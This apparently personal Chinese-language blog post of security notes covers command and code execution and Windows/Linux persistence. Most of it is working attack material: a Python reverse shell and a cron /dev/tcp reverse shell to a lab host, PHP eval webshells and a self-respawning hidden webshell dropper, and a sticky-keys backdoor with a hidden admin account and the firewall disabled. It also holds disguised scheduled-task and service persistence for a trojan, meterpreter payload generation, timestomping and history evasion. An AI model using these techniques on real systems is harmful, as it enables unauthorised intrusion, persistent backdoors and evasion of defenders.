<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>命令执行和代码执行 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="chmod +x .&#x2F;* import socket,subprocess,os;s&#x3D;socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.2.77”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),">
<meta property="og:type" content="article">
<meta property="og:title" content="命令执行和代码执行">
<meta property="og:url" content="http://example.com/2024/01/19/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="chmod +x .&#x2F;* import socket,subprocess,os;s&#x3D;socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.2.77”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121204650077.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121205120830.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121205213425.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121205301672.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121205340869.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121205846981.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121205652850.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121210215246.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121210539449.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121210737866.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240122151802764.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123102339349.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123103914650.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123104023435.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123110118811.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123110650724.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123110746474.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240122191100724.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240122192311431.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240122192531468.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240122193140128.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240122193719290.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240122195333336.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240122200649909.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123144620155.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123145158614.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123145958114.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123153222315.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123153301498.png">
<meta property="article:published_time" content="2024-01-19T06:25:24.000Z">
<meta property="article:modified_time" content="2024-01-30T06:43:48.115Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121204650077.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

  
<link rel="stylesheet" href="/plugin/bganimation/bg.css">

  

  <link href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.10.0/katex.min.css" rel="stylesheet" type="text/css">
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <div class="outer">
        <div class="widget-wrap mobile-header">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <img class="avatar" src="https://avatars0.githubusercontent.com/u/20333903?v=3&amp;s=460">
    <h2 class="author">John Doe</h2>
    <h3 class="description"></h3>
    <div class="count-box">
      <a href="/archives"><div><strong>65</strong><br>文章</div></a>
      <a href="/categories"><div><strong>0</strong><br>分类</div></a>
      <a href="/tags"><div><strong>1</strong><br>标签</div></a>
    </div>
    <ul class="blog-link">
     
          <a href="/" title="Home">
            <li>主页</li>
          </a>
        
          <a href="/archives" title="Archives">
            <li>归档</li>
          </a>
        
          <a href="/categories" title="Categories">
            <li>分类</li>
          </a>
        
          <a href="/tags" title="Tags">
            <li>标签</li>
          </a>
        
    </ul>
  </div>
</div>

        <section id="main"><article id="post-命令执行" class="wow slideInRight article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2024/01/19/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" class="article-date">
  <time class="post-time" datetime="2024-01-19T06:25:24.000Z" itemprop="datePublished">
    <span class="post-month">1月</span><br/>
    <span class="post-day">19</span>
  </time>
</a>
   
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      命令执行和代码执行
    </h1>
  

        <div>
          
          
              

          
        </div>
      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>chmod +x .&#x2F;*</p>
<p>import socket,subprocess,os;s&#x3D;socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.2.77”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p&#x3D;subprocess.call([“&#x2F;bin&#x2F;sh”,”-i”]);</p>
<h3 id="windows命令执行"><a href="#windows命令执行" class="headerlink" title="windows命令执行"></a>windows命令执行</h3><p>命令执行php：</p>
<p><strong>system(),passthru(),exec(),&#96;&#96;</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">passthru(&#x27;whoami&#x27;);</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">&lt;?pp</span><br><span class="line">echo exec(&#x27;whoami&#x27;);</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">$_GET(&#x27;a&#x27;);</span><br><span class="line">system(&#x27;whoami&#x27;);</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">&lt;?pp</span><br><span class="line">echo `whoami`;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>二次注入</strong></p>
<p>网页输入的a进行了限制，可以选择二次注入。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=eval($_GET[a]);&amp;a=system(&quot;tac flag.p?p&quot;);</span><br></pre></td></tr></table></figure>

<h4 id="Windows命令连接符"><a href="#Windows命令连接符" class="headerlink" title="Windows命令连接符"></a><strong>Windows命令连接符</strong></h4><p>“&amp;”命令前面的语句为假，则直接执行后面的;前面的语句为真，命令都执行。</p>
<p>“&amp;&amp;”前面的语句为假，则直接出错，后面的也不执行;前面为真，都执行。</p>
<p>“|”前面命令正确，直接执行后面的语句;前面的语句为假，则直接出错，后面的也不执行。</p>
<p>“||”前面出错，执行后面的;前面不出错，不会只执行前面的，不执行后面的命令。</p>
<p><strong>Linux下的命令连接符</strong>包括“;”、“&amp;”、“&amp;&amp;”、“I”、“Il”。</p>
<p>“:”分号操作符使多个命令顺序执行，前面命令和后面命令的都会执行。</p>
<p>“&amp;”和号操作符,作用是使命令在后台运行,这样就可以同时执行多条命令。</p>
<p>“&amp;&amp;”与操作符,第一个命令执行成功，执行第二个命令。</p>
<p>“|”管道操作符，将第一个命令的输出作为第二个命令的输入，前面跟后面的都会执行，但是只显示后面的执行结果。</p>
<p>“||”或操作符，类似于编程中的 if else语句。前面的命令执行成功后面的命令不会执行，前面的命令执行失败后面的命令会执行。</p>
<h4 id="常见命令"><a href="#常见命令" class="headerlink" title="常见命令"></a>常见命令</h4><p>cat:由第一行开始显示内容，并将所有内容输出<br>tac:从最后一行倒序显示内容，并将所有内容输出<br>more:根据窗口大小，一页一页的现实文件内容<br>less:和more类似，但其优点可以往前翻页，而且进行可以搜索字符<br>head:只显示头几行<br>tail:只显示最后几行<br>nl:类似于cat -n，显示时输出行号<br>tailf:类似于tail -f<br>sort%20&#x2F;flag 读文件<br>dir来查看当前目录文件</p>
<p>ctrl + u（强制打开浏览器控制台）</p>
<p>view-source:（放在网站开头，打开网页源码）</p>
<p>看源码</p>
<p>看UA头</p>
<p>看robots.txt(机器人文件。)</p>
<p>看index.phps(下载)</p>
<p>kali目录扫描dirsearch -r: <a target="_blank" rel="noopener" href="http://www.zip/">www.zip</a></p>
<p>swp数据交换文件</p>
<p>cookie</p>
<p>kali中nslookup查看dns域名解析。</p>
<p>源码泄露重要(editor)信息，上传文件空间查看var-&gt;www-&gt;html-&gt;nothinghere</p>
<p>公开的信息比如邮箱，可能造成信息泄露，产生严重后果</p>
<p>探针泄露，网站&#x2F;tz.php,点phpinfo，找ctf</p>
<p>数据库泄露,sql备份，backup.</p>
<h3 id="代码执行"><a href="#代码执行" class="headerlink" title="代码执行"></a>代码执行</h3><h4 id="描述"><a href="#描述" class="headerlink" title="描述"></a>描述</h4><p>eval（）和assert（）函数导致的代码执行漏洞大多是因为载入缓存或者模板以及对变量的处理不严格导致，比如直接把一个外部可控的参数拼接到模板里面，然后调用这两个函数去当成PHP代码执行。</p>
<p>preg_replace（）函数的代码执行需要存在&#x2F;e参数，这个函数原本是用来处理字符串的，因此漏洞出现最多的是在对字符串的处理，比如URL、HTML标签以及文章内容等过滤功能。</p>
<p>call_user_func（）和call_user_func_array（）函数的功能是调用函数，多用在框架里面动态调用函数，所以一般比较小的程序出现这种方式的代码执行会比较少。array_map（）函数的作用是调用函数并且除第一个参数外其他参数为数组，通常会写死第一个参数，即调用的函数。</p>
<h4 id="函数"><a href="#函数" class="headerlink" title="函数"></a>函数</h4><p>eval      <code>&lt;?php @eval($_POST[cmd])?&gt;</code></p>
<p>assert  <code>&lt;?php @assert($_POST[cmd])?&gt;</code></p>
<p>call_user_func()  <code>&lt;call_user_func($_POST[&#39;fun&#39;],$_POST[&#39;arg&#39;])&gt;</code></p>
<p>call_user_func_array()  <code>&lt;?php call_user_func_array($_POST[&#39;fun&#39;], $_POST[&#39;arg&#39;]);?&gt;</code></p>
<p>create_function()  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$id = $_GET[&#x27;id&#x27;];</span><br><span class="line">$code = &#x27;echo&#x27;.$func.&#x27;test&#x27;.$id.&#x27;;&#x27;;</span><br><span class="line">creat_function(&#x27;$func&#x27;,$code)</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>array_map()</p>
<p>preg_replace()</p>
<h4 id="加密，密码学"><a href="#加密，密码学" class="headerlink" title="加密，密码学"></a>加密，密码学</h4><p>机密性</p>
<p>完整性</p>
<p>可用性</p>
<p>认证性</p>
<p>不可否认性</p>
<p><strong>凯撒密码：</strong></p>
<p>偏移编码，一般是4位或13位</p>
<p><strong>Base家族：</strong></p>
<p>base16、64、58、62、85、91、92、100</p>
<p>Unicode编码：</p>
<p>中文编码</p>
<p><strong>URL编码：</strong></p>
<p>XXEncode:</p>
<p>花朵编码：，音符编码：，文言文编码：</p>
<p><strong>猪圈密码：</strong></p>
<p>ROTN：</p>
<p>ROT5&#x2F;13&#x2F;18&#x2F;47(偏移编码)</p>
<p><strong>佛曰加密：</strong></p>
<p>盲文编码：</p>
<p>培根密码：</p>
<p>三分密码：</p>
<p><strong>栅栏密码：</strong></p>
<p>jsfuck编码：</p>
<p>摩斯密码：</p>
<p>phpfuck：</p>
<h3 id="免杀"><a href="#免杀" class="headerlink" title="免杀"></a>免杀</h3><h3 id="权限维持"><a href="#权限维持" class="headerlink" title="权限维持"></a>权限维持</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">ignore_user_abort(); //关掉浏览器，PHP脚本也可以继续执行.</span><br><span class="line">set_time_limit(0);//通过set_time_limit(0)可以让程序无限制的执行下去</span><br><span class="line">$interval = 5; // 每隔*秒运行</span><br><span class="line">do &#123;</span><br><span class="line">$filename = &#x27;test.php&#x27;;</span><br><span class="line">if(file_exists($filename)) &#123;</span><br><span class="line">echo &quot;xxx&quot;;</span><br><span class="line">&#125;</span><br><span class="line">else &#123;</span><br><span class="line">$file = fopen(&quot;test.php&quot;, &quot;w&quot;);</span><br><span class="line">$txt = &quot;&lt;?php @eval($_POST[cmd]); ?&gt;\n&quot;;   //木马密码cmd</span><br><span class="line">fwrite($file, $txt);</span><br><span class="line">fclose($file);</span><br><span class="line">eval(system(&quot;Attrib +s +a +h +r test.php&quot;)); //隐藏文件</span><br><span class="line">&#125;</span><br><span class="line">sleep($interval);</span><br><span class="line">&#125; while (true);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h4 id="锁屏下开命令行"><a href="#锁屏下开命令行" class="headerlink" title="锁屏下开命令行"></a>锁屏下开命令行</h4><p>命令行下输入下面语句：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">move C:\windows\system32\sethc.exe C:\windows\system32\sethc.exe.bak</span><br><span class="line"></span><br><span class="line">Copy C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe</span><br></pre></td></tr></table></figure>

<p>如果报错或其他原因，可以去手动更改。</p>
<p>搜索C:\Windows\System32文件夹里的sethc.exe文件。右键打开文件路径。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121204650077.png" alt="image-20240121204650077"></p>
<p>返回上一级目录，右键System32文件夹，点击属性&#x3D;》安全&#x3D;》高级&#x3D;》更改&#x3D;》高级。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121205120830.png" alt="image-20240121205120830"></p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121205213425.png" alt="image-20240121205213425"></p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121205301672.png" alt="image-20240121205301672"></p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121205340869.png" alt="image-20240121205340869"></p>
<p>点击立即查找&#x3D;》选着Everyone&#x3D;》点击确定。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121205846981.png" alt="image-20240121205846981"></p>
<p>勾选如图两个内容，点击确定。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121205652850.png" alt="image-20240121205652850"></p>
<p>进入System32将文件sethc.exe改为sethc.exe1</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121210215246.png" alt="image-20240121210215246"></p>
<p>搜索cmd.exe,打开路径。</p>
<p>将其复制并改名为setch.exe</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121210539449.png" alt="image-20240121210539449"></p>
<p>win+L    息屏</p>
<p>连续按五次shift即可打开命令行。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240121210737866.png" alt="image-20240121210737866"></p>
<p>net user qianxin QanXin.Nb123 &#x2F;add<br>net localgroup administrators qianxin &#x2F;add<br>netsh firewall set opmode disable<br>netsh advfirewall show allprofiles<br>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server &#x2F;v fDenyTSConnections &#x2F;t REG_DWORD &#x2F;d 0 &#x2F;f<br>netstat -anop tcp | find “3389”</p>
<h5 id="创建我的电脑"><a href="#创建我的电脑" class="headerlink" title="创建我的电脑"></a>创建我的电脑</h5><p>创建文件夹，将文件夹名改为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">我的电脑.&#123;20D04FE0-3AEA-1069-A2D8-08002B30309D&#125;    </span><br><span class="line">回收站.&#123;645ff040-5081-101b-9f08-00aa002f954e&#125; </span><br><span class="line">拔号⽹络.&#123;992CFFA0-F557-101A-88EC-00DD010CCC48&#125; </span><br><span class="line">打印机.&#123;2227a280-3aea-1069-a2de-08002b30309d&#125; </span><br><span class="line">控制⾯板.&#123;21ec2020-3aea-1069-a2dd-08002b30309d&#125; </span><br><span class="line">⽹上邻居.&#123;208D2C60-3AEA-1069-A2D7-08002B30309D&#125;  </span><br></pre></td></tr></table></figure>

<h4 id="创建不可删除文件"><a href="#创建不可删除文件" class="headerlink" title="创建不可删除文件"></a>创建不可删除文件</h4><h5 id="文件夹"><a href="#文件夹" class="headerlink" title="文件夹"></a>文件夹</h5><p>创建文件夹夹(创建的文件夹很难删除)，在c盘的用户的Administrator中创建a…文件夹。可以放到网站根目录下。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">md a...\</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240122151802764.png" alt="image-20240122151802764"></p>
<p>可以将文件copy到文件a…文件夹中。</p>
<p>删除</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rd /s /q a...\</span><br></pre></td></tr></table></figure>

<h5 id="文件"><a href="#文件" class="headerlink" title="文件"></a>文件</h5><p>Windows 下不能够以下⾯这些字样来命名⽂件&#x2F;⽂件夹，包括：aux，com1，com2，prn，con和nul等，但 是通过cmd下是可以创建此类⽂件夹的，使⽤copy命令即可实现 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy 1.php  \\.\D:\desk\www\aux.php</span><br></pre></td></tr></table></figure>

<p>查看文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">type \\.\C:\phpstudy_pro\WWW\wo\aux.php</span><br></pre></td></tr></table></figure>

<p>删除文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">del \\.\C:\phpstudy_pro\WWW\wo\aux.php</span><br></pre></td></tr></table></figure>

<h4 id="计划任务"><a href="#计划任务" class="headerlink" title="计划任务"></a>计划任务</h4><p>在计划任务\Microsoft\WindowsUpdate\Tasks\Secute\Update有一个触发器。可以用其自动启用木马。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123102339349.png" alt="image-20240123102339349"></p>
<p>设置一个触发器使其每一分钟就触发一次木马。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /create /tn &quot;\Microsoft\WindowsUpdate\Tasks\Secute\Update\Run&quot; /tr &quot;C:\Users\Administrator\Desktop\Server.exe&quot; /rl highest /F /sc minute /mo 1  /RU system</span><br></pre></td></tr></table></figure>

<p>可以在任务管理器中找到木马，结束任务。发现在一分钟后又会自启动。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123103914650.png" alt="image-20240123103914650"></p>
<p>可以在任务计划里右键将其删除。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123104023435.png" alt="image-20240123104023435"></p>
<h4 id="服务"><a href="#服务" class="headerlink" title="服务"></a>服务</h4><p>设置开机自启。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc create &quot;.NET CLR Networking 3.5.0.0&quot; binpath= &quot;cmd.exe /k C:\Users\Administrator\Desktop\Server.exe&quot; depend= Tcpip obj= Localsystem start= auto</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123110118811.png" alt="image-20240123110118811"></p>
<p>查询</p>
<p>可以在任务管理器的服务中找到.NET CLR Networking 3.5.0.0</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123110650724.png" alt="image-20240123110650724"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sc   //查看sc命令</span><br><span class="line">sc query &quot;.NET CLR Networking 3.5.0.0&quot;</span><br></pre></td></tr></table></figure>

<p>删除</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc delete &quot;.NET CLR Networking 3.5.0.0&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123110746474.png" alt="image-20240123110746474"></p>
<h5 id="将生成的服务更难删除"><a href="#将生成的服务更难删除" class="headerlink" title="将生成的服务更难删除"></a>将生成的服务更难删除</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc sdset &quot;.NET CLR Networking 3.5.0.0&quot; &quot;D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)&quot;</span><br></pre></td></tr></table></figure>

<p>永恒账户</p>
<p>注册表</p>
<p>计算机\HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\qianxin$</p>
<h3 id="kali命令执行"><a href="#kali命令执行" class="headerlink" title="kali命令执行"></a>kali命令执行</h3><h4 id="kali写码"><a href="#kali写码" class="headerlink" title="kali写码"></a>kali写码</h4><p>进入msfconsole集中控制台。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240122191100724.png" alt="image-20240122191100724"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">whoami</span><br><span class="line">use exploit/multi/handler</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240122192311431.png" alt="image-20240122192311431"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">show options</span><br><span class="line">set payload windows/meterpreter/reverse_tcp</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240122192531468.png" alt="image-20240122192531468"></p>
<p>yes代表哪一行是必填的，要在lhost中填入kali的ip地址。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">ifconfig  //查ip地址</span><br><span class="line">set lhost 192.168.2.77</span><br><span class="line">show options //查看是否改完</span><br><span class="line">run  //运行</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240122193140128.png" alt="image-20240122193140128"></p>
<h4 id="生成码"><a href="#生成码" class="headerlink" title="生成码"></a>生成码</h4><p>在另一个页面输入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p //查看msfvenom怎么用</span><br><span class="line">msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.59 lport=4444 -f exe -o 1.exe  //生成一个名为1.php的码</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240122193719290.png" alt="image-20240122193719290"></p>
<p>将生成的码移到win10虚拟机中，双击运行。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240122195333336.png" alt="image-20240122195333336"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">getsystem</span><br><span class="line">whoami</span><br><span class="line">help</span><br><span class="line">shell</span><br><span class="line">chcp 65001   //转换成中文</span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ps</span><br><span class="line">//explorer.exe是系统一定有的文件，启动桌面</span><br><span class="line">migrate 8644 //隐藏1.txt码</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240122200649909.png" alt="image-20240122200649909"></p>
<p>shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">crontab -e</span><br><span class="line">crontab -l</span><br></pre></td></tr></table></figure>





<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">* * * * * /bin/bash -c &#x27;/bin/sh -i &gt;&amp;/dev/tcp/192.168.2.77/4444 0&gt;&amp;1&#x27;;\r%100c\n</span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 4444</span><br></pre></td></tr></table></figure>



<p>要修改时间，要将该文件的所有父目录都需改。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">touch -r 源文件名 新文件名</span><br></pre></td></tr></table></figure>

<p>文件上锁</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">chattr +i 1.txt  //加锁</span><br><span class="line">chattr -i 1.txt  //解锁</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123144620155.png" alt="image-20240123144620155"></p>
<p>不记录历史记录操作</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat .zsh_history   //.zsh_history是一个记录历史命令的文件</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123145158614.png" alt="image-20240123145158614"></p>
